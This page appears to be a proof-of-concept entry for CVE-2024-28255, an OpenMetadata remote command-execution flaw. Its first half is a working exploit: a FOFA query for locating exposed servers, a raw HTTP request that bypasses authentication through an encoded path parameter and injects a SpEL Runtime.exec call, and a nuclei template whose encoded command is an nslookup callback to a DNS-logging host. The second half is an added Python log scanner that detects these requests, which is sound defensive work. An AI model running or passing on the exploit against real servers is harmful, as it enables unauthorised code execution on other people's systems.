## OpenMetadata Command Execution (CVE-2024-28255)

## fofa

```
icon_hash="733091897"
```

## poc

```
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64-encoded command%22))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
```

![78d091e4fbeaf6007c6605c09ff4025d](https://github.com/wy876/POC/assets/139549762/977f9bcb-c7f7-4a73-9918-9c06844c1436)

## nuclei POC

```
id: CVE-2024-28255

info:
  name: CVE-2024-28255
  author: xiaoming
  severity: high
  description: OpenMetadata Command Execution
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
  - raw:
      - |+
        GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
        Connection: close
        Accept-Encoding: gzip

    redirects: true
    matchers-condition: and
    matchers:
      - id: 1
        type: word
        part: body
        words:
          - "400"
          - java.lang.ProcessImpl
        condition: and
```
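
A log-side check for the two traits visible in the request shown on this page: a `;` path parameter carrying a percent-encoded slash, and a SpEL type reference (`T(...)`) in the expression segment of the condition-validation endpoint. This is an added example, not code from the original page or from OpenMetadata; the combined log format, the sample lines, the addresses and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CONDITION_EP = "/events/subscriptions/validation/condition/"
SPEL_TYPE_REF = re.compile(r"\bT\(\s*[\w.$]+\s*\)")  # e.g. T(java.lang.Runtime)

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Apr/2024:10:00:00 +0000] "GET /api/v1/tables?limit=10 HTTP/1.1" 200 512',
    '198.51.100.8 - - [01/Apr/2024:10:00:02 +0000] "POST /api/v1/users/login HTTP/1.1" 200 934',
    '203.0.113.5 - - [01/Apr/2024:10:00:05 +0000] "GET /api/v1;v1%2fusers%2flogin/events/'
    'subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.'
    'String(T(java.util.Base64).getDecoder().decode(%22PLACEHOLDER%22))) HTTP/1.1" 400 310',
    '203.0.113.6 - - [01/Apr/2024:10:00:09 +0000] "GET /api/v1;x=v1%2Fusers%2Flogin/tables HTTP/1.1" 200 88',
]

def classify(target):
    """Return the list of suspicious traits found in one request target."""
    path = target.split("?", 1)[0]
    segments = path.split("/")
    findings = []
    # Trait 1: a ';' path parameter whose decoded value contains a slash.
    if any("/" in unquote(s.split(";", 1)[1]) for s in segments if ";" in s):
        findings.append("path-param-with-encoded-slash")
    # Trait 2: a SpEL type reference in the expression segment of the
    # condition-validation endpoint, after dropping path parameters.
    clean = unquote("/".join(s.split(";", 1)[0] for s in segments))
    if CONDITION_EP in clean and SPEL_TYPE_REF.search(clean.split(CONDITION_EP, 1)[1]):
        findings.append("spel-type-reference")
    return findings

def scan(lines):
    """Return (client_ip, findings) for every log line with at least one trait."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (found := classify(m.group("target"))):
            hits.append((m.group("ip"), found))
    return hits

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ",".join(found))
```

Either trait alone is worth an alert: the first fires on any route, the second only on the condition-validation endpoint.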